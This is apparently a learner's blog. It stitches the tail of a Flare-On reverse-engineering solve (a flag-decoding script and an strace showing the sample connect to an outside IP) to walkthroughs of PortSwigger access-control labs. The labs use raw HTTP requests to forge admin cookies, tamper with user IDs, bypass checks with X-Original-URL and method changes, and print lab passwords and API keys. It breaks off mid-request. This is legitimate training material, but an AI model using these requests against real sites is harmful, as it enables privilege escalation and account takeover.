rol byte ptr [rax], 22
xor byte ptr [rax], 0xae
rol byte ptr [rax], 0x98
cmp byte ptr [rax], 0xf3
"""
l.append( ror(ror(ror(0xf3, 0x98) ^ 0xae, 22), 32) )

### letter 14
"""
ror byte ptr [rax], 110
add byte ptr [rax], 0xd2
cmp byte ptr [rax], 0xa6
"""
l.append( rol(0xa6 - 0xd2, 110) )

### letter 15
"""
add byte ptr [rax], 52
cmp byte ptr [rax], 98
"""
l.append( 98 - 52 )

### letter 16
"""
add byte ptr [rax], 0xcd
sub byte ptr [rax], 16
add byte ptr [rax], 98
xor byte ptr [rax], 0xb2
cmp byte ptr [rax], 50
"""
l.append( (50 ^ 0xb2) - 98 + 16 - 0xcd )

### letter 17
"""
xor byte ptr [rax], 0xb7
xor byte ptr [rax], 115
ror byte ptr [rax], 7
cmp byte ptr [rax], 0xeb
"""
l.append( rol(0xeb, 7) ^ 115 ^ 0xb7 )

### letter 18
"""
add byte ptr [rax], 52
sub byte ptr [rax], 97
ror byte ptr [rax], 54
add byte ptr [rax], 91
sub byte ptr [rax], 76
cmp byte ptr [rax], 11
"""
l.append( rol(11 + 76 - 91, 54) + 97 - 52 )

### letter 19
"""
add byte ptr [rax], 90
cmp byte ptr [rax], 0x9a
"""
l.append( 0x9a - 90 )

### letter 20
"""
ror byte ptr [rax], 0xa2
cmp byte ptr [rax], 0x99
"""
l.append( rol(0x99, 0xa2) )

### letter 21
"""
xor byte ptr [rax], 126
sub byte ptr [rax], 0xe7
cmp byte ptr [rax], 43
"""
l.append( (43 + 0xe7) ^ 126 )

### letter 22
"""
sub byte ptr [rax], 0xb8
xor byte ptr [rax], 0x86
add byte ptr [rax], 78
ror byte ptr [rax], 74
rol byte ptr [rax], 87
cmp byte ptr [rax], 0xaf
"""
l.append( ((rol(ror(0xaf, 87), 74) - 78) ^ 0x86) + 0xb8 )

### letter 23
"""
ror byte ptr [rax], 0x86
xor byte ptr [rax], 0xe8
rol byte ptr [rax], 0x95
xor byte ptr [rax], 74
xor byte ptr [rax], 0xad
cmp byte ptr [rax], 0xc3
"""
l.append( rol(ror(0xc3 ^ 0xad ^ 74, 0x95) ^ 0xe8, 0x86) )

### letter 24
"""
ror byte ptr [rax], 69
xor byte ptr [rax], 0xcc
add byte ptr [rax], 28
cmp byte ptr [rax], 3
"""
l.append( rol((3 - 28) ^ 0xcc, 69) )

### letter 25
"""
sub byte ptr [rax], 74
cmp byte ptr [rax], 0xe3
"""
l.append( 0xe3 + 74 )

### letter 26
"""
xor byte ptr [rax], 0xa5
ror byte ptr [rax], 0x90
cmp byte ptr [rax], 0xca
"""
l.append( rol(0xca, 0x90) ^ 0xa5 )

### letter 27
"""
ror byte ptr [rax], 0xde
rol byte ptr [rax], 54
xor byte ptr [rax], 120
sub byte ptr [rax], 0xd8
cmp byte ptr [rax], 62
"""
l.append( rol(ror((62 + 0xd8) ^ 120, 54), 0xde) )

### letter 28
"""
add byte ptr [rax], 0xb5
sub byte ptr [rax], 0xad
ror byte ptr [rax], 0x89
rol byte ptr [rax], 0xa2
rol byte ptr [rax], 17
cmp byte ptr [rax], 0xd8
"""
l.append( rol(ror(ror(0xd8, 17), 0xa2), 0x89) + 0xad - 0xb5 )

### letter 29
"""
add byte ptr [rax], 64
sub byte ptr [rax], 33
ror byte ptr [rax], 0xc0
cmp byte ptr [rax], 0x82
"""
l.append( rol(0x82, 0xc0) + 33 - 64 )

### letter 30
"""
rol byte ptr [rax], 0xe3
cmp byte ptr [rax], 123
"""
l.append( ror(123, 0xe3) )

### letter 31
"""
sub byte ptr [rax], 120
ror byte ptr [rax], 0xf6
cmp byte ptr [rax], 0xd7
"""
l.append( rol(0xd7, 0xf6) + 120 )

# modulo 256 applied to ensure values are in range(256)
print ''.join([chr(i % 256) for i in l])

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
└─$ python2 solve.py
l1nhax.hurt.u5.a1l@flare-on.com

After giving flag as arg2 it is trying to connect with the some host, maybe try to mimic like a C2 server,

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
└─$ strace -i ./e7bc5d2c0cf4480348f5504196561297.patched2 4815162342 l1nhax.hurt.u5.a1l@flare-on.com

[00007e36940de557] execve("./e7bc5d2c0cf4480348f5504196561297.patched2", ["./e7bc5d2c0cf4480348f55041965612"..., "4815162342", "l1nhax.hurt.u5.a1l@flare-on.com"], 0x7fffd1dd75e8 /* 35 vars */) = 0
[00000000004a9297] uname({sysname="Linux", nodename="DESKTOP-VRSQRAJ", ...}) = 0
[00000000004aa78a] brk(NULL)            = 0x4913000
[00000000004aa78a] brk(0x49141c0)       = 0x49141c0
[000000000045e3f5] arch_prctl(ARCH_SET_FS, 0x4913880) = 0
[00000000004aa78a] brk(0x49351c0)       = 0x49351c0
[00000000004aa78a] brk(0x4936000)       = 0x4936000
[000000000047431b] ptrace(PTRACE_TRACEME) = -1 EPERM (Operation not permitted)
[000000000047c9c0] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
[000000000047c882] rt_sigaction(SIGCHLD, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
[000000000047c9c0] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
[000000000047c9c0] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
[000000000047c882] rt_sigaction(SIGCHLD, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
[000000000047c9c0] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
[000000000047c9c0] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
[000000000047c882] rt_sigaction(SIGCHLD, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
[000000000047c9c0] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
[000000000047c9c0] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
[000000000047c882] rt_sigaction(SIGCHLD, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
[000000000047c9c0] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
[000000000047c9c0] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
[000000000047c882] rt_sigaction(SIGCHLD, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
[000000000047c9c0] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
[00007fff1a8fc114] socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
[00007fff1a8fc140] connect(3, {sa_family=AF_INET, sin_port=htons(39426), sin_addr=inet_addr("9.30.75.86")}, 16

Here is our flag,

l1nhax.hurt.u5.a1l@flare-on.com

Here is the flow of this program. (There might be some inaccuracy or mistake so sorry for that in advance because i am a leaner like you. 😅)

PortsWigger Access Control Vulnerabilities Labs - November 2025

Thu, 20 Nov 2025 00:00:00 GMT

Access Control Vulnerabilities

Access control is the application of constraints on who or what is authorized to perform actions or access resources. In the context of web applications, access control is dependent on authentication and session management:
- Authentication confirms that the user is who they say they are.
- Session management identifies which subsequent HTTP requests are being made by that same user.
- Access control determines whether the user is allowed to carry out the action that they are attempting to perform.
Broken access controls are common and often present a critical security vulnerability. Design and management of access controls is a complex and dynamic problem that applies business, organizational, and legal constraints to a technical implementation. Access control design decisions have to be made by humans so the potential for errors is high.

Lab 1: Unprotected admin functionality

To solve the lab we have to delete the user carlos.
So i just try to look at robots.txt and i found,

User-agent: *
Disallow: /administrator-panel

So we can go in this page delete the user carlos and solve the lab,

GET /administrator-panel/delete?username=carlos HTTP/1.1
Host: 0ab500d003e965c580818a9b00050039.web-security-academy.net
Connection: keep-alive
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0ab500d003e965c580818a9b00050039.web-security-academy.net/administrator-panel
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=qPY5IBPdN6VLb2HqlU538eZ407hst2GU

Lab 2: Unprotected admin functionality with unpredictable

To Solve the lab by accessing the admin panel, and using it to delete the user carlos.
So to find unpredicted path i visited the view-sorce of website and i found this js,
- In which the path leaked so we go there and delete the user and we solve the lab,

var isAdmin = false;
if (isAdmin) {
   var topLinksTag = document.getElementsByClassName("top-links")[0];
   var adminPanelTag = document.createElement('a');
   adminPanelTag.setAttribute('href', '/admin-wd4zsz');
   adminPanelTag.innerText = 'Admin panel';
   topLinksTag.append(adminPanelTag);
   var pTag = document.createElement('p');
   pTag.innerText = '|';
   topLinksTag.appendChild(pTag);
}

Lab 3: User role controlled by request parameter

This lab has an admin panel at /admin, which identifies administrators using a forgeable cookie.
Solve the lab by accessing the admin panel and using it to delete the user carlos.
We can log in to our own account using the following credentials: wiener:peter,
So to see cookie we have to see login req, here it is

GET /my-account?id=wiener HTTP/1.1
Host: 0a7000d4037f65ad80b399c400510047.web-security-academy.net
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Referer: https://0a7000d4037f65ad80b399c400510047.web-security-academy.net/login
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: Admin=false; session=JR0YqIvOVYRdKXAwl6OkqxKfY7kUBmAx

As we can see Admin variable set to false so if we make is true then we login as login,

So now we have to do req to admin page with true flag and we will able to access admin page,

GET /admin HTTP/1.1
Host: 0a7000d4037f65ad80b399c400510047.web-security-academy.net
Connection: keep-alive
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a7000d4037f65ad80b399c400510047.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: Admin=true; session=JR0YqIvOVYRdKXAwl6OkqxKfY7kUBmAx

And now we can delete carlos and lab will be solved,

GET /admin/delete?username=carlos HTTP/1.1
Host: 0a7000d4037f65ad80b399c400510047.web-security-academy.net
Connection: keep-alive
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a7000d4037f65ad80b399c400510047.web-security-academy.net/admin
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: Admin=true; session=JR0YqIvOVYRdKXAwl6OkqxKfY7kUBmAx

Lab 4: User role can be modified in user profile

we can log in to our own account using the following credentials: wiener:peter.

Now, We try to use update email feature and capture its request,

POST /my-account/change-email HTTP/1.1
Host: 0a09009403b0b40b81a476d5008600f3.web-security-academy.net
Connection: keep-alive
Content-Length: 27
sec-ch-ua-platform: "Windows"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
Content-Type: text/plain;charset=UTF-8
sec-ch-ua-mobile: ?0
Accept: */*
Origin: https://0a09009403b0b40b81a476d5008600f3.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a09009403b0b40b81a476d5008600f3.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=DmyfyBF39LooQXPSNWWEJvY1utRZbbWU

{
"email":"hello@hello.com",
}

Now we will access /admin and try to add roleId=2 as said in description,
And we got admin panel access and after deleting the carlos user we will solve the lab

POST /admin HTTP/1.1
Host: 0a09009403b0b40b81a476d5008600f3.web-security-academy.net
Connection: keep-alive
Content-Length: 27
sec-ch-ua-platform: "Windows"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
Content-Type: text/plain;charset=UTF-8
sec-ch-ua-mobile: ?0
Accept: */*
Origin: https://0a09009403b0b40b81a476d5008600f3.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a09009403b0b40b81a476d5008600f3.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=DmyfyBF39LooQXPSNWWEJvY1utRZbbWU

{
"email":"hello@hello.com",
"roleid":2
}

/admin/delete?username=carlos

Lab 5: User ID controlled by request parameter

This lab has a horizontal privilege escalation vulnerability on the user account page.
To solve the lab, obtain the API key for the user carlos and submit it as the solution.
We can log in to our own account using the following credentials: wiener:peter.

Here is the update email req,

POST /my-account/change-email HTTP/1.1
Host: 0a15001603d47635811b8470003e00fd.web-security-academy.net
Connection: keep-alive
Content-Length: 61
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Origin: https://0a15001603d47635811b8470003e00fd.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a15001603d47635811b8470003e00fd.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=Ajc2ZIV4rVnCqphGJYrhDCzNOgvdkvXN

email=hello%40hello.com&csrf=3qE6wFPDrUGWXfezJ4Q6pG1LIf4UyQdU

I just changed the ID in url from wiener to carlos and got the API and by submitting it solve the lab,

API: O1JiYloiVdEaN7WXkUmmUT733yv2voem

Lab 6: User ID controlled by request parameter, with unpredictable user IDs

This lab has a horizontal privilege escalation vulnerability on the user account page, but identifies users with GUIDs.
To solve the lab, find the GUID for carlos, then submit his API key as the solution.
You can log in to your own account using the following credentials: wiener:peter

This time there is GUID so we have to find GUID of carlos and replace so we can steal API key,
So here is my approach,
- First, i found blog by written carlos and try to visit his profile
- And there i found leaked GUID of carlos.

userId: bde1e1b2-ff21-4466-8613-50ee5a9db031

And now, by swapping this GUID with wiener we got API and by submitting we solve the lab,

API Key: 1qPGbVCgrT3i4J5vf1FKfAtkyY6w6mVh

Lab 7: User ID controlled by request parameter with data leakage in redirect

This lab contains an access control vulnerability where sensitive information is leaked in the body of a redirect response.
To solve the lab, obtain the API key for the user carlos and submit it as the solution.
You can log in to your own account using the following credentials: wiener:peter.

GET /my-account?id=wiener HTTP/1.1
Host: 0afe003004a363fa80e59453007b00d4.web-security-academy.net
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Referer: https://0afe003004a363fa80e59453007b00d4.web-security-academy.net/login
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=QCmu5AFtYvvsFjEJ9dZRNxfvxnIwabhL

By tweaking id=carlos, i got leaked info in response body before redirecting the page,
And it API key leaked,

By submitting this key we solve the lab,

API: OB9hCa6mX548iLM6dsEonZO7lJtPuIfW

Lab 8: User ID controlled by request parameter with password disclosure

This lab has user account page that contains the current user's existing password, prefilled in a masked input.
To solve the lab, retrieve the administrator's password, then use it to delete the user carlos.
You can log in to your own account using the following credentials: wiener:peter.

I tried to tweak the ID to administrator and i got its page, now we can simply see password by changing the value of input field in source code,

administator: 6pzztldhgjyxynwy5d3z

Now we login using this and delete carlos,

Lab 9: Insecure direct object references

This lab stores user chat logs directly on the server's file system, and retrieves them using static URLs.
Solve the lab by finding the password for the user carlos, and logging into their account.
This is the chat functionality,

I intercept the view-transcript req and here it is,
It downloads 2.txt containing some msgs,

GET /download-transcript/2.txt HTTP/1.1
Host: 0a2900f104417d4681a620750044002a.web-security-academy.net
Connection: keep-alive
sec-ch-ua-platform: "Windows"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a2900f104417d4681a620750044002a.web-security-academy.net/chat
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=34dLOGbFSD6QeX82iwjNzB29t41EeC0k

So i tried to change it with 1.txt so previous conversation and this is static files in server so maybe it is there and i found file,
It contains password of carlos,

CONNECTED: -- Now chatting with Hal Pline --
You: Hi Hal, I think I've forgotten my password and need confirmation that I've got the right one
Hal Pline: Sure, no problem, you seem like a nice guy. Just tell me your password and I'll confirm whether it's correct or not.
You: Wow you're so nice, thanks. I've heard from other people that you can be a right ****
Hal Pline: Takes one to know one
You: Ok so my password is gddxknfya7etljq17h3t. Is that right?
Hal Pline: Yes it is!
You: Ok thanks, bye!

And by login with this carlos:gddxknfya7etljq17h3t we solve the lab,

Lab 10: URL-based access control can be circumvented

This website has an unauthenticated admin panel at /admin, but a front-end system has been configured to block external access to that path.
However, the back-end application is built on a framework that supports the X-Original-URL header.
To solve the lab, access the admin panel and delete the user carlos.
Direct access to /admin is got blocked,

So as description we can try X-Original-URL with /admin path on GET / and it worked and we got 200 OK,

GET / HTTP/1.1
Host: 0a3d00e80361cfc281a91dad0043009f.web-security-academy.net
Connection: keep-alive
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a3d00e80361cfc281a91dad0043009f.web-security-academy.net/
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
X-Original-URL: /admin
Cookie: session=2KZBhLQpUR1JzXtIVbkjNU6mj1vzBGe1

Now we will delete carlos user so we have to put /admin/delete and put path in GET /?username=carlos,
- IIS treats X-Original-URL as path only, not full URL
- Many reverse proxies sanitize query params from custom headers Because passing user-controlled query strings via headers could cause parameter injection, log poisoning, or routing confusion.

GET /?username=carlos HTTP/1.1
Host: 0a3d00e80361cfc281a91dad0043009f.web-security-academy.net
Connection: keep-alive
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a3d00e80361cfc281a91dad0043009f.web-security-academy.net/
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
X-Original-URL: /admin/delete
Cookie: session=2KZBhLQpUR1JzXtIVbkjNU6mj1vzBGe1

Lab 11: Method-based access control can be circumvented

This lab implements access controls based partly on the HTTP method of requests.
You can familiarize yourself with the admin panel by logging in using the credentials administrator:admin.
To solve the lab, log in using the credentials wiener:peter and exploit the flawed access controls to promote yourself to become an administrator.
Login as administrator:admin

GET /my-account?id=administrator HTTP/1.1
Host: 0a8200d103e2614582c3b05c00a800ca.web-security-academy.net
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Referer: https://0a8200d103e2614582c3b05c00a800ca.web-security-academy.net/login
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=JISTQTv1fu6p92Y57OUD3BazVZBoueuE

In Admin Panel there is one feature called ==Upgrade or Downgrade user== to admin and here is the req of it,

POST /admin-roles HTTP/1.1
Host: 0a8200d103e2614582c3b05c00a800ca.web-security-academy.net
Connection: keep-alive
Content-Length: 30
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Origin: https://0a8200d103e2614582c3b05c00a800ca.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a8200d103e2614582c3b05c00a800ca.web-security-academy.net/admin
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=KaR1ZqDShj7H7ZzkKXkRdjRMuMjTBDeK

username=carlos&action=upgrade

Our aim to login as wiener with this admin privileges without getting upgraded so now we will proceed,
First we have to open incognito/private windows to login with another creds of wiener,
So we login using that and copy cookie of this user,

8nQDBnAR7nxOil95r1ARNLF0ECNDIK6M

Replace this cookie with /admin-roles req endpoint cookie and ==try to upgrade carlos users using wiener's cookie==, but it says 401 unauthorized

Now we try XPOST instead of POST and toggle the request to GET it worked and user will promoted,

Now to solve the lab, we can put out username which is 0xb14cky and after that we promoted to admin privileges and solve the lab,

GET /admin-roles?username=0xb14cky&action=upgrade HTTP/1.1

[!summary] The lab is vulnerable because the server blocks only POST, so using an unknown method like POSTX bypasses the check and still triggers the admin delete action. Because HTTP servers don’t reject unknown verbs — the HTTP/1.1 RFC explicitly requires them to accept any method token. "Method names are case-sensitive tokens. Servers MUST be able to handle unknown methods."

Lab 12: Multi-step process with no access control on one step

This lab has an admin panel with a flawed multi-step process for changing a user's role.
You can familiarize yourself with the admin panel by logging in using the credentials administrator:admin.
To solve the lab, log in using the credentials wiener:peter and exploit the flawed access controls to promote yourself to become an administrator.
We logged in as admin,

Here is user promotion request,

POST /admin-roles HTTP/1.1
Host: 0a0b001d0376ec1f819e666000d700a1.web-security-academy.net
Connection: keep-alive
Content-Length: 30
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Origin: https://0a0b001d0376ec1f819e666000d700a1.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a0b001d0376ec1f819e666000d700a1.web-security-academy.net/admin
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=iBQWLMIZ6Oa4opn17rkNuMAb31kIzrbk

username=wiener&action=upgrade

There is one intermediate confirmation page so we have to bypass that,
Here is req of this,

POST /admin-roles HTTP/1.1
Host: 0a0b001d0376ec1f819e666000d700a1.web-security-academy.net
Connection: keep-alive
Content-Length: 45
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Origin: https://0a0b001d0376ec1f819e666000d700a1.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a0b001d0376ec1f819e666000d700a1.web-security-academy.net/admin-roles
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=iBQWLMIZ6Oa4opn17rkNuMAb31kIzrbk

action=upgrade&confirmed=true&username=wiener

We simply again replace cookie of wiener with previous one and by send the req we solve the lab,
There is one extra meter added which is confirmed=true

j93UDgIGL0w1aNHILJdm6yKYyGnYMXcm

Cookie replaced, and by sending we solved the lab,

Cookie: session=j93UDgIGL0w1aNHILJdm6yKYyGnYMXcm

Lab 13: Referer-based access control

This lab controls access to certain admin functionality based on the Referer header. You can familiarize yourself with the admin panel by logging in using the credentials administrator:admin.
To solve the lab, log in using the credentials wiener:peter and exploit the flawed access controls to promote yourself to become an administrator.

Here is the promotion req,

GET /admin-roles?username=carlos&action=upgrade HTTP/1.1
Host: 0a23006b03751b2f82317e77003700cf.web-security-academy.net
Connection: keep-alive
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
